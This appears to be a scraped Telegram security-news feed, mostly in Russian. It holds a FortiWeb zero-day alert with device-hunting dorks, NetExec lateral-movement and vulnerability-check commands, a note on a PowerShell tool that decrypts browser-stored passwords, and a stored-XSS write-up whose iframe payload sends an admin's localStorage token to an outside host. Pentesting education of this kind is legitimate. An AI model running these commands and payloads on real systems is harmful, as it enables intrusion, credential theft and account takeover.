Forwarded from 1N73LL1G3NC3
This media is not supported in your browser
VIEW IN TELEGRAM
Fortinet 0day
An auth bypass + path traversal in Fortinet FortiWeb to create new administrative users on exposed devices without requiring authentication.
Blog: https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/
Dork:
ZoomEye Dork: app="FortiWeb"
HUNTER: product.name="FortiWeb"
An auth bypass + path traversal in Fortinet FortiWeb to create new administrative users on exposed devices without requiring authentication.
Blog: https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/
Dork:
ZoomEye Dork: app="FortiWeb"
HUNTER: product.name="FortiWeb"
👍2
www.opennet.ru
Релиз Red Hat Enterprise Linux 9.7 и 10.1
Компания Red Hat представила релиз дистрибутива Red Hat Enterprise Linux 10.1, а также обновление прошлой ветки - Red Hat Enterprise Linux 9.7. Готовые установочные образы доступны для зарегистрированных пользователей Red Hat Customer Portal (для оценки …
🔗Ссылка:
https://opennet.ru/64231/
https://opennet.ru/64231/
Forwarded from RedBlue Notes
NetExec в реальной работе: когда инструмент не мешает, а помогает
Если честно, большинство тулов по боковой разведке в Windows-сетях либо слишком громоздкие, либо очень шумные, либо требуют больше внимания к себе, чем к инфраструктуре. NetExec выигрывает потому, что ведёт себя предельно приземлённо. Его удобно запускать прямо в момент, когда нужно «прощупать» живые хосты, проверить валидность учётки или понять, куда вообще есть дорога. Например, когда получаешь пару доменных логинов и пытаешься выяснить, насколько далеко они тебя пустят, достаточно выполнить что-то вроде:
Без особых танцев он покажет онлайн-хосты, статусы логонов и где возможен дальнейший доступ.
Быстрая доменная разведка: зачем усложнять то, что можно сделать одной командой😑
Здесь NetExec экономит время, потому что умеет выгружать нужную информацию сам, без лишних телодвижений.
Такая команда закрывает потребность в первичной доменной разведке целиком. Она удобно работает прямо с Red Team-контейнеров, с Linux-боксов в инфраструктуре и даже с имплантов на отдалённых хостах, если есть стабильный канал. В бою это критично: чем меньше прыгаешь между утилитами — тем меньше вероятность ошибиться и оставлять лишние следы.
Проверка уязвимых сервисов: та самая простота, которая экономит часы🧛
Разведка редко ограничивается только «кто жив» и «какие группы есть в домене». Нередко нужно быстро проверить известные уязвимости или кривые конфигурации, и вот тут флаг -M реально выручает. Когда прилетает задача убедиться, что контроллер домена не подвержен ZeroLogon, достаточно выполнить
И сразу получить чёткий ответ, без установки отдельного PoC и без риска перепутать параметры. С принтайтмерами ситуация похожая:
сразу покажет, есть ли шанс на дальнейшую эксплуатацию. Это выглядит почти лениво, но правде в глаза — скорость здесь стоит куда дороже «чистоты» инструментов.
Когда инструмент работает на тебя👨💻
В операциях ценится не только функциональность, но и предсказуемость. NetExec ведёт себя стабильно и одинаково с любых позиций: будь то Kali, Commando VM, обычный Ubuntu-бокс в сети заказчика или VPS-посредник (не надо блечить пожалуйста ), через который идёт туннелирование. Его приятно использовать как средство бокового перемещения по SMB, WinRM или MSSQL. Например, WinRM-доступ можно быстро проверить командой
и сразу понять, где можно закрепиться или выполнить удалённый PowerShell. Он одинаково полезен и на этапах красной команды, и в пентестах, и даже в балках синей команды, когда нужно быстро воспроизвести технику атакующих.
NetExec — это чумовой инструмент🤹
Нет пафоса, нет лишнего шума. Это просто утилита, которую удобно использовать. Она не закрывает все задачи мира, но отлично помогает ориентироваться в Windows-сетях, искать точки входа, проверять уязвимости и собирать доменную разведку без плясок с инструментарием. И чем больше работаешь в живых сетях, тем больше понимаешь: иногда инструмент должен быть не «крутым», а просто нормальным, человеческим, удобным. Именно таким и ощущается NetExec.
Подписывайтесь на канал, дальше больше!
Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону
Если честно, большинство тулов по боковой разведке в Windows-сетях либо слишком громоздкие, либо очень шумные, либо требуют больше внимания к себе, чем к инфраструктуре. NetExec выигрывает потому, что ведёт себя предельно приземлённо. Его удобно запускать прямо в момент, когда нужно «прощупать» живые хосты, проверить валидность учётки или понять, куда вообще есть дорога. Например, когда получаешь пару доменных логинов и пытаешься выяснить, насколько далеко они тебя пустят, достаточно выполнить что-то вроде:
nxc smb 10.10.0.0/24 -u user -p pass
Без особых танцев он покажет онлайн-хосты, статусы логонов и где возможен дальнейший доступ.
Быстрая доменная разведка: зачем усложнять то, что можно сделать одной командой
Здесь NetExec экономит время, потому что умеет выгружать нужную информацию сам, без лишних телодвижений.
nxc ldap 10.10.0.1 -d domain.local -u redblue -p password -k --bloodhound -ns 10.10.0.1 -c All
Такая команда закрывает потребность в первичной доменной разведке целиком. Она удобно работает прямо с Red Team-контейнеров, с Linux-боксов в инфраструктуре и даже с имплантов на отдалённых хостах, если есть стабильный канал. В бою это критично: чем меньше прыгаешь между утилитами — тем меньше вероятность ошибиться и оставлять лишние следы.
Проверка уязвимых сервисов: та самая простота, которая экономит часы
Разведка редко ограничивается только «кто жив» и «какие группы есть в домене». Нередко нужно быстро проверить известные уязвимости или кривые конфигурации, и вот тут флаг -M реально выручает. Когда прилетает задача убедиться, что контроллер домена не подвержен ZeroLogon, достаточно выполнить
nxc smb dc01.domain.local -u user -p pass -M zerologon
И сразу получить чёткий ответ, без установки отдельного PoC и без риска перепутать параметры. С принтайтмерами ситуация похожая:
nxc smb 10.10.0.5 -M printnightmare
сразу покажет, есть ли шанс на дальнейшую эксплуатацию. Это выглядит почти лениво, но правде в глаза — скорость здесь стоит куда дороже «чистоты» инструментов.
Когда инструмент работает на тебя
В операциях ценится не только функциональность, но и предсказуемость. NetExec ведёт себя стабильно и одинаково с любых позиций: будь то Kali, Commando VM, обычный Ubuntu-бокс в сети заказчика или VPS-посредник (
nxc winrm targets.txt -u admin -p pass
и сразу понять, где можно закрепиться или выполнить удалённый PowerShell. Он одинаково полезен и на этапах красной команды, и в пентестах, и даже в балках синей команды, когда нужно быстро воспроизвести технику атакующих.
NetExec — это чумовой инструмент
Нет пафоса, нет лишнего шума. Это просто утилита, которую удобно использовать. Она не закрывает все задачи мира, но отлично помогает ориентироваться в Windows-сетях, искать точки входа, проверять уязвимости и собирать доменную разведку без плясок с инструментарием. И чем больше работаешь в живых сетях, тем больше понимаешь: иногда инструмент должен быть не «крутым», а просто нормальным, человеческим, удобным. Именно таким и ощущается NetExec.
Подписывайтесь на канал, дальше больше!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1👎1🔥1
Forwarded from s0ld13r ch. (s0ld13r)
Invoke-PowerChrome 🌐
Invoke-PowerChrome - скрипт для сбора и декрипта паролей из браузеров (Chrome, Edge) написанный на PowerShell. Хорошо подойдет для поиска дополнительных учеток, если уже есть права локального администратора😃
Сам модуль будет интегрирован в PsMapExec для удаленного сбора паролей с хостов😎
💻 Github: https://github.com/The-Viper-One/Invoke-PowerChrome
🧢 s0ld13r
Invoke-PowerChrome - скрипт для сбора и декрипта паролей из браузеров (Chrome, Edge) написанный на PowerShell. Хорошо подойдет для поиска дополнительных учеток, если уже есть права локального администратора
Сам модуль будет интегрирован в PsMapExec для удаленного сбора паролей с хостов
A PowerShell script for decrypting Chromium-based browser passwords, supporting both v10 (DPAPI user) and Google Chrome v20 (App Bound Encryption) encrypted blobs.
The script dynamically interacts with Windows cryptographic APIs to decrypt passwords without external dependencies and can be executed in memory.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
www.opennet.ru
В PyPI введено подтверждение смены устройства, с которого осуществляется вход
Разработчики репозитория Python-пакетов PyPI (Python Package Index) внедрили дополнительный этап проверки во время входа, требующий подтверждения операции по email в случае подключения с устройства или браузера, с которого раннее не производился вход. Подтверждение…
🔗Ссылка:
https://opennet.ru/64257/
https://opennet.ru/64257/
Forwarded from Fail Auth
HTML Injection → Stored XSS → Hijack accessToken
Во время анализа одного из веб-приложений наткнулся на поле, которое обрабатывает ввод без должной фильтрации.
Примечение: cервис фильтрует <script> теги, поэтому XSS реализован с обходом — без явного использования скриптовых тегов.
Решил проверить — вставил простой HTML:
Текст стал крупнее — значит innerHTML или подобная конструкция.
Далее потестировал теги:
Браузер создал элементы прямо в DOM. Очевидный признак HTML Injection, причём без CSP и фильтров. Поле сохраняется в базу➡️ отображается в админке ➡️ возникает вопрос: можно ли это раскрутить до XSS?
➡️ Рабочий XSS-пэйлоад:
В данном случае он читает токен из localStorage и вызывает alert() с его значением.
Минус: работает не во всех браузерах и часто режется CSP, но в слабозащищённых фронтах может быть отличной стартовой точкой.
➡️ Эскалация XSS:
Пэйлоад делает внешний запрос на ваш сервер (например, Interactsh), передавая туда значение токена. Вместо всплывающего окна (alert) вы сразу получаете лог токена.
Важно: поле, в которое внедряется нагрузка, сохраняется в базе данных и отображается в административной панели. Это означает, что код выполняется от лица администратора при просмотре, что приводит к краже его токена и потенциальному захвату аккаунта.
➡️ Особенность уязвимости теги:
➡️ Что это даёт:
➡️ Советы для тестирования:
Во время анализа одного из веб-приложений наткнулся на поле, которое обрабатывает ввод без должной фильтрации.
Примечение: cервис фильтрует <script> теги, поэтому XSS реализован с обходом — без явного использования скриптовых тегов.
Решил проверить — вставил простой HTML:
<h1>Test</h1> <!-- изменение размера шрифта -->
Текст стал крупнее — значит innerHTML или подобная конструкция.
Далее потестировал теги:
<img src="x"> <!-- битая картинка -->
<input> <!-- лишний input на странице -->
Браузер создал элементы прямо в DOM. Очевидный признак HTML Injection, причём без CSP и фильтров. Поле сохраняется в базу
<iframe src="javascript:alert(localStorage.accessToken)"></iframe>
В данном случае он читает токен из localStorage и вызывает alert() с его значением.
Минус: работает не во всех браузерах и часто режется CSP, но в слабозащищённых фронтах может быть отличной стартовой точкой.
<iframe src="javascript:fetch('//your.interact.sh?token=' + localStorage.accessToken)"></iframe>Пэйлоад делает внешний запрос на ваш сервер (например, Interactsh), передавая туда значение токена. Вместо всплывающего окна (alert) вы сразу получаете лог токена.
Важно: поле, в которое внедряется нагрузка, сохраняется в базе данных и отображается в административной панели. Это означает, что код выполняется от лица администратора при просмотре, что приводит к краже его токена и потенциальному захвату аккаунта.
🔴 Инъекция сохраняется в БД (Stored)🔴 Отрабатывает на стороне администратора🔴 Через XSS читается accessToken из localStorage
🔴
Захват токена администратора
🔴
Возможность делать запросы от его имени
🔴
Потенциальный full access к admin-панели
🔴
Ищите HTML-теги, которые влияют на DOM (текст, форма, медиа)
🔴
Проверяйте innerHTML, outerHTML, dangerouslySetInnerHTML в React
🔴
Тестируйте на img, input, iframe, svg, math, script и template
🔴
Не ограничивайтесь alert(1), пробуйте localStorage, fetch, document.cookie, navigator, location
🔴
Используйте Interactsh, Burp Collaborator, xsshunter для подтверждения уязвимости
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from 🕷 BugBountyRu
IDOR — один из самых распространенных и простых багов. Но знаешь ли ты все фазы тестирования, после которых с уверенностью можно сказать «Здесь нет IDOR»?
Разобрали первую фазу, а остальные — в чек-листе
POST/PUT/DELETE).Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM